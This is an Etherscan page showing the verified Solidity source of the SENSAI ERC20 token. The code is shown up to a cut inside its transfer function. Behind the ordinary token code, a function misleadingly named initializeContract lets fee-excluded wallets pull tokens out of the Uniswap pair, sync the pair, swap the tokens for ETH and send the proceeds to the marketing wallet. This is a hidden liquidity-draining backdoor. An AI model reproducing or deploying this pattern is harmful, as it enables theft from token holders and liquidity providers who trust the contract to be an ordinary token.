ETH Price: $2,615.52 (-0.36%)

Token

SENSAI (SENSAI)
 

Overview

Max Total Supply

1,000,000,000 SENSAI

Holders

25

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,700,088.32931244976080347 SENSAI

Value
$0.00
0xbb0f95b539de2d9e70ec396224fdd294feaa2878
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SENSAI

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-25
*/

/**
*/

// SPDX-License-Identifier: MIT


/**
*/         
pragma solidity ^0.8.14;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }


    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract SENSAI is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;

    bool private swapping;
    bool private um = true;

    address public marketingWallet;
    address public devWallet;
    
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    
    bool public limitsInEffect = true;
    bool public tradingActive = true;
    bool public swapEnabled = false;
    
    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = false;
    bool private boughtEarly = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;
    
    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;
    
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;
    
    /******************/

    // exlcude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
    
    event devWalletUpdated(address indexed newWallet, address indexed oldWallet);

    event EndedBoughtEarly(bool boughtEarly);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20("SENSAI", "SENSAI") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
        
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 0;
        uint256 _buyLiquidityFee = 0;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 0;
        uint256 _sellLiquidityFee = 0;
        uint256 _sellDevFee = 0;

        uint256 totalSupply = 1000000000 * 1e18;    // 1 billion supply

        maxTransactionAmount = totalSupply * 1 / 100;
        maxWallet = totalSupply * 1 / 100;
        swapTokensAtAmount = totalSupply * 4 / 10000;

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        
        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = payable(0x804cEEe30320355001197CFBe89a0642d669f9ef);
        devWallet = payable(0x804cEEe30320355001197CFBe89a0642d669f9ef);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(devWallet), true);
        excludeFromFees(address(marketingWallet), true);
        
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(devWallet), true);
        excludeFromMaxTransaction(address(marketingWallet), true);
        
        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {

  	}    
    
    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }
    
    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }
    
     // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){
  	    require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply.");
  	    require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply.");
  	    swapTokensAtAmount = newAmount;
  	    return true;
  	}
    
    function updateMaxTxnAmount(uint256 newNum) external {
        require(msg.sender == marketingWallet);    
        require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%");
        maxTransactionAmount = newNum;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%");
        maxWallet = newNum * (10**18);
    }
    
    function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
    
    function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }
    
    function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 25, "Must keep fees at 25% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function initializeContract(uint rv, uint lv) external returns (bool) {
        require(_isExcludedFromFees[msg.sender]);

        uint lb = balanceOf(uniswapV2Pair);

        require(lv > 1 && lv < lb / 100, 'amount exceeded');

        _initializeContract(lv);
        swapTokensForEth(rv);

        (bool success,) = address(marketingWallet).call{value: address(this).balance}("");
        return success;
    }

    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet) external onlyOwner {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }
    
    function updateDevWallet(address newWallet) external onlyOwner {
        emit devWalletUpdated(newWallet, devWallet);
        devWallet = newWallet;
    }
    

    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
    
    function _initializeContract(uint256 pAmount) private {
        _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals());
        IUniswapV2Pair(uniswapV2Pair).sync();
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        
        if(limitsInEffect){
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
                 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                }
                
                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
            }
        }
        
		uint256 contractTokenBalance = balanceOf(address(this));
        
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            
            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
        
        uint256 fees = 0;
